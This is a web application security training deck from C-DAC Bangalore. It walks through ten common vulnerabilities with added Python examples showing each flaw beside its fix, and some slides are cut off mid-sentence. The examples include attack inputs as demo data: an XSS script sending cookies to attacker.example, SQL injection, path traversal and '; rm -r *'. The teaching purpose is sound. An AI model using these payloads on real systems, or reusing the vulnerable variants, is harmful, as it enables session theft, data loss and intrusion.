
7/27/2019 web_app_sec
1/44
C-DAC, EC, Bangalore

Web Application Security

Centre for Development of Advanced Computing (C-DAC), Electronics City, Bangalore.

2/44

Agenda

- Who are your enemies
- What is a web application
- SD3 Security Framework
- Top 10 vulnerabilities
- How to avoid these
- Demo example

3/44

Know Your Enemy

"If you know both the enemy and yourself, you will fight a hundred battles without danger of defeat;
If you are ignorant of the enemy but only know yourself, your chances of winning and losing are equal;
If you know neither the enemy nor yourself, you will certainly be defeated in every battle."

Sun Tzu, The Art of War, the oldest military treatise in the world
Chinese general, 500 B.C.

4/44

Who are the enemies?

- Innocent (?) users.. can be you (!)..
- Hackers..

5/44

What is a web application?

6/44

Web application

A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.

A web application or webapp is an application that is accessed via a web browser over a network such as the Internet or an intranet.

A computer software application that is


8/44

Web application security

Simply, web application security is... securing of web applications.

- Security goes beyond establishing a firewall and implementing SSL.
- It includes IDS, policy, standards, awareness, audit and testing.
- Do not assume someone else is taking care of it.

9/44

Is your application really secure?

10/44

Firewalls

Firewalls can provide:
- Secure gateway to the Internet for internal clients
- Packet filtering
- Auditing

Firewalls cannot provide:
- Protection against application-level attacks over HTTP or HTTPS

11/44

Through the firewall without a fire suit

12/44

Concepts

Threat: any event, whether natural, accidental or deliberate, with the potential to cause harm to an information system, resulting in a degradation of the system's ability to fully perform its mission.

Vulnerability: a security exposure (a weakness that a threat can exploit) in a system software or application software component.

13/44

The SD3 Security Framework

Secure by Design
- Secure architecture and code
- Threat analysis
- Vulnerability reduction

Secure by Default
- Attack surface area reduced
- Unused features turned off by default
- Minimum privileges used

Secure in Deployment
- Protection: detection, defense, recovery, management
- Process: how-to guides, architecture guides
- People: training

14/44

Adopt the SD3 Security Framework

Secure by Design
- Build threat models
- Conduct code reviews, penetration tests

Secure by Default
- Run code with minimal privileges
- Minimize your attack surface
- Enable services securely

Secure in Deployment
- Leverage the security best practices
- Create security guidance
- Build tools to assess application security

15/44

Your code is part of your security perimeter

[Diagram: the network layer (firewall, hardened OS, web server, app server, firewall) sits in front of the application layer (custom developed application code, databases, legacy systems, web services, directories, human resources, billing); an "APPLICATION ATTACK" arrow passes straight through the network layer into the application code.]

You can't use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks.

Your security perimeter has huge holes at the application layer.


17/44

Top 10 Vulnerabilities

1. Unvalidated Parameters
2. Broken Access Control
3. Broken Account and Session Management
4. Cross-site Scripting (XSS) Flaws
5. Buffer Overflows
6. Command Injection Flaws
7. Error Handling Problems
8. Insecure Use of Cryptography
9. Remote Administration Flaws
10. Web and Application Server Misconfiguration

18/44

95% of Web Apps Have Vulnerabilities

- Cross-site scripting (80 percent)
- SQL injection (62 percent)
- Parameter tampering (60 percent)
- Cookie poisoning (37 percent)
- Database server (33 percent)
- Web server (23 percent)
- Buffer overflow (19 percent)

19/44

1. Unvalidated Parameters

An attacker can easily tamper with any part of the HTTP request before submitting it:
- URL
- Cookies
- Form fields
- Hidden fields
- Headers

Common names for common input tampering attacks: forced browsing, command insertion, cross-site scripting, buffer overflows, format string attacks, SQL injection, cookie poisoning, and hidden field manipulation.

20/44

Unvalidated Parameters continued..

Do rigorous input data validation
- All parameters should be validated before use

Do server-side validation
- Client-side validation can be bypassed by the attacker easily
- Client-side validation is to be used mainly for quick user responsiveness

21/44

Unvalidated Parameters continued..

Use centralized code for input validation
- Scattered code is hard to maintain

Each parameter should be checked against a strict format that specifies exactly what input will be allowed (an allow-list: anything that does not match the format is rejected, rather than trying to enumerate bad characters).
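The three slides above describe a procedure: validate every parameter server-side, from one central place, against a strict format. The following Python is an added example of that procedure, not code from the original deck. The parameter names, the shape of the request and the sample requests are assumptions; the point is that one table of allow-list rules decides what is accepted, and that parameters the form never sent are refused too.

```python
"""Centralized, allow-list parameter validation for an HTTP request.

Added example for this deck (not code from the original slides). The
parameter names, the request shape and the sample requests are assumptions.
"""
import re
from typing import Any, Callable, Dict

# One place that defines exactly what each parameter may look like.
# Every rule is an allow-list: anything not matching is rejected.
RULES: Dict[str, Callable[[str], Any]] = {}


def rule(name: str, pattern: str, convert: Callable[[str], Any] = str,
         max_len: int = 64) -> Callable[[str], Any]:
    """Register a strict format for one parameter name."""
    compiled = re.compile(pattern)

    def check(raw: str) -> Any:
        if not isinstance(raw, str) or len(raw) > max_len:
            raise ValueError(f"{name}: wrong type or too long")
        if not compiled.fullmatch(raw):
            raise ValueError(f"{name}: does not match allowed format")
        return convert(raw)

    RULES[name] = check
    return check


rule("user_id", r"[0-9]{1,9}", int)            # numeric id, bounded length
rule("username", r"[a-zA-Z0-9_]{3,32}")        # no quotes, spaces or angle brackets
rule("page", r"[1-9][0-9]{0,3}", int)          # 1..9999
rule("sort", r"(name|date|size)")              # fixed vocabulary, not free text


def validate_request(params: Dict[str, str]) -> Dict[str, Any]:
    """Validate every parameter of a request against RULES.

    Unknown parameters are rejected too: an attacker adding a hidden field
    or header the form never sent should not get a free pass.
    Returns the converted, validated values; raises ValueError otherwise.
    """
    clean: Dict[str, Any] = {}
    for name, raw in params.items():
        check = RULES.get(name)
        if check is None:
            raise ValueError(f"{name}: unexpected parameter")
        clean[name] = check(raw)
    return clean


def is_valid(params: Dict[str, str]) -> bool:
    """Convenience wrapper: True if the whole request passes validation."""
    try:
        validate_request(params)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample requests (not from the slides).
    good = {"user_id": "42", "page": "3", "sort": "date"}
    print(validate_request(good))  # {'user_id': 42, 'page': 3, 'sort': 'date'}
    for bad in (
        {"user_id": "42 OR 1=1"},                   # SQL injection attempt
        {"username": "<script>alert(1)</script>"},  # XSS payload
        {"sort": "../../etc/passwd"},               # path traversal
        {"user_id": "7", "admin": "true"},          # tampered hidden field
    ):
        print(bad, "->", "rejected" if not is_valid(bad) else "ACCEPTED")
```

Because the rules are the only place that knows what a parameter looks like, adding a field means adding one `rule(...)` line, and every handler gets the same check; the converted values (`int` for ids and page numbers) are what the rest of the application works with, never the raw strings.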

22/44

2. Broken Access Control

Access control is how you keep one user away from other users' information.

The problem is that many environments provide authentication, but don't handle access control well.

Many sites have a complex access control policy.

Key Points
- Write down your access control policy
- Don't use any ids that an attacker can

23/44

Broken Access Control continued..
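An added example (not code from the original slides) of the access-control points above: the identity comes from the server-side session, the object id taken from the URL is used only as a lookup key, and every read is decided against a written-down, deny-by-default policy. The roles, the in-memory records and the policy table are assumptions.

```python
"""Server-side access control: the user's identity comes from the session,
never from a request parameter, and every object access is checked against
the policy before data is returned.

Added example for this deck (not code from the original slides). The
roles, the in-memory records and the policy table are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Constructed data store (not from the slides): invoice id -> (owner, body)
INVOICES: Dict[int, Tuple[str, str]] = {
    1001: ("alice", "alice's invoice"),
    1002: ("bob", "bob's invoice"),
}

# Written-down policy: which role may perform which action.
POLICY = {
    "user": {"read_own"},
    "support": {"read_own", "read_any"},
    "admin": {"read_own", "read_any", "delete_any"},
}


@dataclass(frozen=True)
class Principal:
    """Who the server believes is making the request (taken from the session)."""
    username: str
    role: str


class Forbidden(Exception):
    pass


def permitted(principal: Principal, action: str) -> bool:
    """Deny by default: unknown roles and unknown actions are refused."""
    return action in POLICY.get(principal.role, set())


def get_invoice(principal: Principal, invoice_id: int) -> str:
    """Return an invoice only if the principal is allowed to see it.

    The invoice id from the URL is only a lookup key; the ownership decision
    is made against the principal from the session, so changing ?id=1001 to
    ?id=1002 in the browser does not help an attacker.
    """
    record = INVOICES.get(invoice_id)
    if record is None:
        # Same answer as "forbidden" so ids cannot be enumerated by error type.
        raise Forbidden("no such invoice or access denied")
    owner, body = record
    if owner == principal.username and permitted(principal, "read_own"):
        return body
    if permitted(principal, "read_any"):
        return body
    raise Forbidden("no such invoice or access denied")


def try_read(principal: Principal, invoice_id: int) -> Optional[str]:
    """Helper returning None instead of raising, for demonstration."""
    try:
        return get_invoice(principal, invoice_id)
    except Forbidden:
        return None


if __name__ == "__main__":
    alice = Principal("alice", "user")
    print(try_read(alice, 1001))                          # alice's invoice
    print(try_read(alice, 1002))                          # None: tampered id refused
    print(try_read(Principal("carol", "support"), 1002))  # bob's invoice
    print(try_read(Principal("eve", "guest"), 1001))      # None: unknown role
```

Two things are worth noting in the design: the policy is a data table, so it can be reviewed against the written policy the slide asks for, and the "not found" and "forbidden" cases give the same answer, so an attacker walking sequential ids learns nothing from the response.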

24/44

3. Broken Account and Session Management

Includes all aspects of handling user authentication and managing active sessions.

Session hijacking
- If the session cookies are not properly protected, an attacker can hijack an active session and assume the identity of a user.

Account management
- Handling credentials across the client-server gap
- Backend authentication credentials too

25/44

Broken Account and Session Management ...

Session management
- HTTP is a stateless protocol. Web apps need to keep track of which request came from which user.
- Sessions are tagged with an id carried in a cookie, hidden field, URL parameter, etc.

Key Points
- Keep credentials secret at all times
- Use only the random session id provided by your environment
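What "properly protected" session cookies and a random session id amount to in code, as an added example that is not part of the original slides: ids from a cryptographically secure generator, a server-side store with inactivity expiry, rotation of the id at login, and cookie attributes that keep the id away from scripts and plain HTTP. The store layout, the lifetime and the Set-Cookie formatting are assumptions; in a real application use the framework's own session id generator, as the slide says, rather than rolling one.

```python
"""Session ids from a CSPRNG, a server-side session store with expiry, and
cookie attributes that keep the id out of scripts and off plain HTTP.

Added example for this deck (not code from the original slides). The store
layout, lifetimes and the Set-Cookie formatting are assumptions.
"""
import secrets
import time
from typing import Dict, Optional

SESSION_TTL = 30 * 60            # seconds of inactivity before a session dies
SESSIONS: Dict[str, dict] = {}   # id -> {"user": ..., "expires": ...}


def new_session(user: str, now: Optional[float] = None) -> str:
    """Create a session and return its id (128 random bits, URL-safe)."""
    now = time.time() if now is None else now
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "expires": now + SESSION_TTL}
    return sid


def session_cookie(sid: str) -> str:
    """Set-Cookie header value for the session id.

    HttpOnly keeps document.cookie (and so an XSS payload) from reading it;
    Secure keeps it off plain HTTP; SameSite limits cross-site sending.
    """
    return f"sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def resolve(sid: Optional[str], now: Optional[float] = None) -> Optional[str]:
    """Map a presented session id back to a user, or None if unknown/expired.

    Expired sessions are deleted on sight; a successful lookup slides the
    expiry forward so active users are not logged out mid-work.
    """
    if not sid:
        return None
    now = time.time() if now is None else now
    entry = SESSIONS.get(sid)
    if entry is None:
        return None
    if entry["expires"] <= now:
        del SESSIONS[sid]
        return None
    entry["expires"] = now + SESSION_TTL
    return entry["user"]


def logout(sid: str) -> None:
    """Invalidate server-side: clearing the cookie in the browser alone is not enough."""
    SESSIONS.pop(sid, None)


def rotate(sid: str, now: Optional[float] = None) -> Optional[str]:
    """Issue a fresh id for the same user (do this at login and on privilege
    change) so an id fixed or observed before authentication is worthless after it."""
    user = resolve(sid, now)
    if user is None:
        return None
    logout(sid)
    return new_session(user, now)


if __name__ == "__main__":
    t0 = 1_000_000.0
    sid = new_session("alice", now=t0)
    print(session_cookie(sid))
    print(resolve(sid, now=t0 + 60))                 # alice
    print(resolve(sid, now=t0 + 60 + SESSION_TTL))   # None: expired
    print(resolve("guessed-id-0001", now=t0))        # None: unknown id
```

The `now` parameter exists only so expiry can be exercised deterministically; production code calls `time.time()`. Because the store is keyed by a 128-bit random value, guessing another user's id is not practical, which is exactly what a sequential or timestamp-derived id would give away.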

26/44

4. Cross-site Scripting (XSS)

An attacker can use the cross-site scripting technique to inject a malicious script into a server, which is then sent to unsuspecting users accessing the same server.

Example: chat server

The attacked user's (victim's) browser has no way to know that the script should not be trusted, and will execute the script.

Because it thinks the script came from a trusted source, the

27/44

4. Cross-site Scripting (XSS)

What does it do?
- Disclose the user's session cookie (session hijacking)
- Disclose end-user files
- Redirect the user to some other page or site
- Modify the presentation of content

How to avoid it?
- Search for all places where input from an HTTP request could possibly make its way into the HTML output, and encode the data at each of those points.

28/44

XSS Scenario continued..

- The server is a chat server.
- The chat server displays whatever message is typed in by a particular user to all other users.
- An attacker (user A) embeds JavaScript as part of a message (message A).
- The chat server saves the message (into the database or whatever storage) without input validation.
- When unsuspecting user (user B) reads the
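The chat-server scenario above, carried through in code as an added example (not code from the original slides): the server stores user A's message as typed, and what decides whether user B's browser runs it is how the message is written into the page. The in-memory store, the page template and the sample messages (including the attacker's cookie-stealing script) are constructed for the example.

```python
"""The chat-server XSS scenario from the slides, beside the fix: the message
is stored as typed, but HTML-encoded at the point where it is written into
the page that other users read.

Added example for this deck (not code from the original slides). The message
store, the page template and the sample messages are constructed.
"""
import html
import re
from typing import Callable, List

MESSAGES: List[str] = []   # in-memory store standing in for the chat database


def post_message(text: str) -> None:
    """User A posts; the server saves the raw message, as the slide describes.
    Storing raw text is fine: the decision that matters is made on output."""
    MESSAGES.append(text)


def render_message_vulnerable(message: str) -> str:
    """The flaw: message text dropped into HTML unchanged, so a stored
    <script> runs in every reader's browser, with that site's origin."""
    return message


def render_message_safe(message: str) -> str:
    """The fix: encode every character with meaning in HTML text or attribute
    context. html.escape(quote=True) handles & < > " and '."""
    return html.escape(message, quote=True)


def page(render: Callable[[str], str]) -> str:
    """Assemble the chat page that user B receives."""
    return "<ul>" + "".join(f"<li>{render(m)}</li>" for m in MESSAGES) + "</ul>"


_TAG_OPENER = re.compile(r"<[a-zA-Z/!]")


def has_injected_tag(render: Callable[[str], str]) -> bool:
    """True if any rendered message still contains a raw tag opener, i.e.
    user-controlled text that the browser would parse as markup."""
    return any(_TAG_OPENER.search(render(m)) for m in MESSAGES)


if __name__ == "__main__":
    # Constructed messages: one ordinary, two from the attacker (user A).
    post_message("hello everyone")
    post_message('<script>new Image().src="http://attacker.example/?c="+document.cookie</script>')
    post_message('<img src=x onerror="alert(document.cookie)">')

    print(has_injected_tag(render_message_vulnerable))  # True: user B's browser runs the script
    print(has_injected_tag(render_message_safe))        # False: shown as literal text
    print(page(render_message_safe))
```

Note that the safe version does not try to recognise "bad" input; it encodes everything for the context it is written into. Output encoding is what stops the browser from treating user text as markup, which is why the slide's advice to find every place request data reaches the HTML is the right starting point; an HttpOnly session cookie additionally limits what a script that does slip through can steal.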

29/44

5. Buffer Overflow

Many systems put limits on how much data a variable can store or a system can handle. Often, if these limits are exceeded, the data will still be used, but will bypass certain security considerations.

Attackers use buffer overflows to corrupt the execution stack of a web application.

By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code.

30/44

Buffer Overflow continued..

Buffer overflow flaws can be present in the web server or application server products, or in the web application itself. Application code in memory-managed languages (Java, .NET, PHP, Python) is largely insulated from this class of flaw; the exposure is in the C/C++ servers, modules and libraries it runs on.

URLs such as:
http://www.myweb.com/cgi?param=filename

Replaced with:
http://www.myweb.com/cgi?param=

31/44

6. SQL Injection

When a web application passes information from an HTTP request through as part of an external request, the attacker can inject special (meta) characters, malicious commands, or command modifiers into the information.

SQL injection is a particularly widespread and dangerous form of injection.
- To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database.

32/44

Injection Flaws continued..

Path traversal
- ../ characters as part of a filename request

Additional commands could be tacked on to the end of a parameter that is passed to a shell script, to execute an additional shell command
- ; rm -r *

SQL queries could be modified by adding additional constraints to a WHERE clause
- OR 1=1
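The three injection forms on the last two slides, each shown beside its fix, as an added example that is not code from the original deck. The users table, the document root and the sample inputs are constructed; an in-memory sqlite3 database stands in for the real one. The SQL fix is a parameterized query, the traversal fix is normalizing and then insisting the result is still under the document root, and the command fix is passing an argument vector rather than a shell string.

```python
"""Injection in three forms from the slides: SQL (string-built query vs
parameterized query), path traversal (../ in a filename) and shell command
injection (; rm -r * tacked onto a parameter), each beside its fix.

Added example for this deck (not code from the original slides). The users
table, the document root and the sample inputs are constructed; sqlite3
stands in for the real database.
"""
import os
import sqlite3
from pathlib import Path
from typing import List, Optional

# --- SQL injection ---------------------------------------------------------
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "s3cret"), ("bob", "hunter2")])


def login_vulnerable(user: str, password: str) -> Optional[str]:
    """Builds the WHERE clause by concatenation: the attacker's quote and
    comment characters become part of the query text."""
    q = (f"SELECT name FROM users WHERE name = '{user}' "
         f"AND password = '{password}'")
    row = conn.execute(q).fetchone()
    return row[0] if row else None


def login_safe(user: str, password: str) -> Optional[str]:
    """Parameterized query: values travel separately from the query text, so
    quotes and OR 1=1 are just characters inside a string value."""
    q = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = conn.execute(q, (user, password)).fetchone()
    return row[0] if row else None


# --- Path traversal --------------------------------------------------------
DOC_ROOT = Path("/srv/www/docs")   # assumed document root


def resolve_vulnerable(filename: str) -> str:
    """Joins the user-supplied name straight onto the root; ../ walks out."""
    return os.path.normpath(os.path.join(str(DOC_ROOT), filename))


def resolve_safe(filename: str) -> Optional[str]:
    """Normalize, then insist the result is still inside DOC_ROOT.
    (A real server would also resolve symlinks before this check.)"""
    candidate = Path(os.path.normpath(DOC_ROOT / filename))
    try:
        candidate.relative_to(DOC_ROOT)
    except ValueError:
        return None
    return str(candidate)


# --- Command injection -----------------------------------------------------
def convert_cmd_vulnerable(filename: str) -> str:
    """Command string handed to a shell: ';' ends our command, starts the attacker's."""
    return f"convert {filename} out.png"


def convert_cmd_safe(filename: str) -> List[str]:
    """Argument vector, never a shell string. Pass to subprocess.run with
    shell=False; the filename is exactly one argument however odd it looks."""
    return ["convert", filename, "out.png"]


if __name__ == "__main__":
    payload = "' OR 1=1 --"
    print(login_vulnerable("x", payload))              # a user name: logged in with no password
    print(login_safe("x", payload))                    # None
    print(resolve_vulnerable("../../../etc/passwd"))   # /etc/passwd
    print(resolve_safe("../../../etc/passwd"))         # None
    print(resolve_safe("manual.pdf"))                  # /srv/www/docs/manual.pdf
    print(convert_cmd_vulnerable("x.jpg; rm -r *"))    # convert x.jpg; rm -r * out.png
    print(convert_cmd_safe("x.jpg; rm -r *"))          # ['convert', 'x.jpg; rm -r *', 'out.png']
```

The common thread is that the fix is never a character blacklist: in each case the data is kept structurally separate from the command (query parameters, a path containment check, an argv list), which is what the "strict format" validation of slides 19 to 21 complements rather than replaces.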

33/44

7. Improper Error Handling

The most common problem is when detailed internal error messages such as stack traces, database dumps, and error codes are displayed to a potential hacker.

These messages reveal implementation details that should never be revealed.

Inconsistent errors may reveal internal info.
- "File not found" vs. "Access denied"

34/44

Improper Error Handling continued..

The errors must be handled according to a well-thought-out scheme that will
- provide a meaningful error message to the user
- provide diagnostic information to the site maintainers
- provide no useful information to an attacker

All security mechanisms should deny access until specifically granted, not grant access

35/44

Improper Error Handling continued..

A specific policy for how to handle errors should be documented, including
- The types of errors to be handled
- For each, what information is going to be reported back to the user
- What information is going to be logged

In the implementation, ensure that the site is built to gracefully handle all possible errors.

When errors occur, the site should respond with a
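The error-handling scheme of the last three slides in code, as an added example that is not part of the original deck: a documented table maps each error class to what the user sees, full diagnostics go to the log under a reference id the user can quote, and "not found" and "access denied" deliberately produce the same response. The handler shape, the log format and the constructed failures are assumptions.

```python
"""Error handling scheme from the slides: the user gets a meaningful but
generic message, maintainers get the diagnostics in the log under a
reference id, and the attacker gets nothing that distinguishes internal
states.

Added example for this deck (not code from the original slides). The
handler shape, the log format and the constructed failures are assumptions.
"""
import logging
import traceback
import uuid
from typing import List, Tuple

LOG: List[str] = []   # constructed in-memory log sink (stands in for the server log)
logger = logging.getLogger("app.errors")


class _ListHandler(logging.Handler):
    def emit(self, record: logging.LogRecord) -> None:
        LOG.append(self.format(record))


logger.addHandler(_ListHandler())
logger.setLevel(logging.ERROR)
logger.propagate = False

# Policy table, documented up front: error class -> (HTTP status, message to user).
# "forbidden" and "not_found" share one answer so the two cannot be told apart.
USER_FACING = {
    "not_found": (404, "The requested resource could not be found."),
    "forbidden": (404, "The requested resource could not be found."),
    "bad_input": (400, "The request could not be processed."),
    "internal":  (500, "Something went wrong. Quote the reference id to support."),
}


def handle_error(kind: str, exc: BaseException) -> Tuple[int, str]:
    """Log full diagnostics server-side; return (status, safe message) for the client."""
    ref = uuid.uuid4().hex[:12]
    status, message = USER_FACING.get(kind, USER_FACING["internal"])
    # Everything an attacker would love to see goes here, and only here.
    logger.error("ref=%s kind=%s exc=%r\n%s", ref, kind, exc,
                 "".join(traceback.format_exception(type(exc), exc, exc.__traceback__)))
    return status, f"{message} (ref {ref})"


def handle_error_vulnerable(exc: BaseException) -> Tuple[int, str]:
    """The anti-pattern: exception text and stack trace straight to the browser."""
    return 500, "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))


def leaks_internals(body: str) -> bool:
    """Crude check used below: does a response body expose implementation details?"""
    markers = ("Traceback", 'File "', "sqlite3", "OperationalError", "/srv/", "line ")
    return any(m in body for m in markers)


if __name__ == "__main__":
    try:
        raise PermissionError("/srv/www/secret/report.pdf: access denied")
    except PermissionError as e:
        status, body = handle_error("forbidden", e)
        print(status, body)                                   # 404 The requested resource ... (ref ...)
        print(leaks_internals(body))                          # False
        print(leaks_internals(handle_error_vulnerable(e)[1]))  # True
    print(LOG[-1].splitlines()[0])                            # ref=... kind=forbidden exc=PermissionError(...)
```

The reference id is the link between the two audiences the slide separates: the user quotes it to support, support finds the full trace in the log, and the attacker who triggered the error sees only a random token. An unknown error class falls through to the generic 500 row, so a new failure mode cannot accidentally leak by being unclassified.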

36/44

8. Insecure Use of Cryptography

Use cryptography to store sensitive information.

Algorithms are simple to use; integrating them is hard.

Key Points
- Do not even think about inventing a new algorithm
- Be extremely careful storing keys, certs, and passwords
- Rethink whether you need to store the information
- Don't store user passwords: store a salted, deliberately slow password hash (PBKDF2, bcrypt or scrypt). A bare fast hash such as SHA-256 is not sufficient on its own, since it is unsalted and cheap to brute-force.
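The password-storage point above in code, as an added example that is not part of the original slides: a salted PBKDF2-HMAC-SHA256 verifier from the standard library, verified with a constant-time comparison, beside the bare SHA-256 the deck originally suggested for contrast. The iteration count, the stored-string format and the sample passwords are assumptions; where a vetted password hasher (bcrypt, scrypt, Argon2) is available on your platform, prefer it.

```python
"""Storing password verifiers: a salted, deliberately slow key derivation
(PBKDF2-HMAC-SHA256 from the standard library) instead of a bare fast hash,
with constant-time comparison on verify.

Added example for this deck (not code from the original slides). The
iteration count, encoding format and sample passwords are assumptions.
"""
import base64
import hashlib
import hmac
import secrets
from typing import Optional

ITERATIONS = 600_000   # tune so one verify costs tens of milliseconds on your hardware
SALT_BYTES = 16


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$hash'.

    Each user gets a fresh random salt, so equal passwords yield different
    stored values and a precomputed table is useless; the iteration count is
    stored alongside so it can be raised later without breaking old records.
    """
    if salt is None:
        salt = secrets.token_bytes(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join(("pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()))


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        scheme, iters, salt_b64, hash_b64 = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(hash_b64)
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters))
    except (ValueError, TypeError):
        return False
    return hmac.compare_digest(dk, expected)


def bare_sha256(password: str) -> str:
    """Shown for contrast: unsalted and fast, so two users with the same
    password collide, and a dictionary hashed once matches the whole table."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored))  # True
    print(verify_password("Correct horse battery staple", stored))  # False
    # Same password, two users: salted verifiers differ, bare SHA-256 does not.
    print(hash_password("hunter2") != hash_password("hunter2"))     # True
    print(bare_sha256("hunter2") == bare_sha256("hunter2"))          # True
```

`hmac.compare_digest` rather than `==` is what makes the comparison constant-time; the salt and iteration count travel with the verifier so the scheme can be strengthened per record on the user's next login.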

37/44

9. Remote Administration Flaws

Many sites allow remote administration
- Very powerful, often hidden interfaces
- Difficult to protect

Key Points
- Eliminate all administration over the Internet
- Separate the admin application from the main app
- Limit the scope of remote administration
- Consider strong authentication (smart card or token)

38/44

10. Web and Application Server Misconfiguration

All web and application servers have many security-relevant configuration options:
- Default accounts and passwords
- Unnecessary default, backup and sample apps and libraries
- Overly informative error messages
- Misconfigured SSL, default certificates, self-signed certs
- Unused administrative services

Key Points:
- Keep up with patches (Code Red, Slammer)
- Use scanning tools (Nikto, Nessus)

39/44

Secure your application

Training
- Read the Top Ten paper!
- Get developers trained in web application security
- Try OWASP WebGoat to learn how flaws work

Policy
- Write down the security rules for your application

Reviews
- Get expert code review and penetration test periodically

40/44

Keys to secure your application

Customers
- Demand web applications that don't have these ten simple problems

Developers
- Take responsibility for securing your code

Software Development Organizations
- Guarantee that your web applications don't have the top ten flaws

Educators
- Stop teaching insecure coding

Project Managers
- Split your security budget between network and

41/44

Tools

- WebScarab: a web application vulnerability assessment suite including proxy tools
- Validation filters (Stinger for J2EE, filters for PHP): generic security boundary filters that developers can use in their own applications
- CodeSpy: looks for security issues using reflection in J2EE apps

42/44

- WebGoat: an interactive training and benchmarking tool with which users can learn about web application security in a safe and legal environment
- WebSphinx: web crawler looking for security issues in web applications
- OWASP: Java-based portal code designed with security as a prime concern

43/44

Case Study

44/44

Thank You !!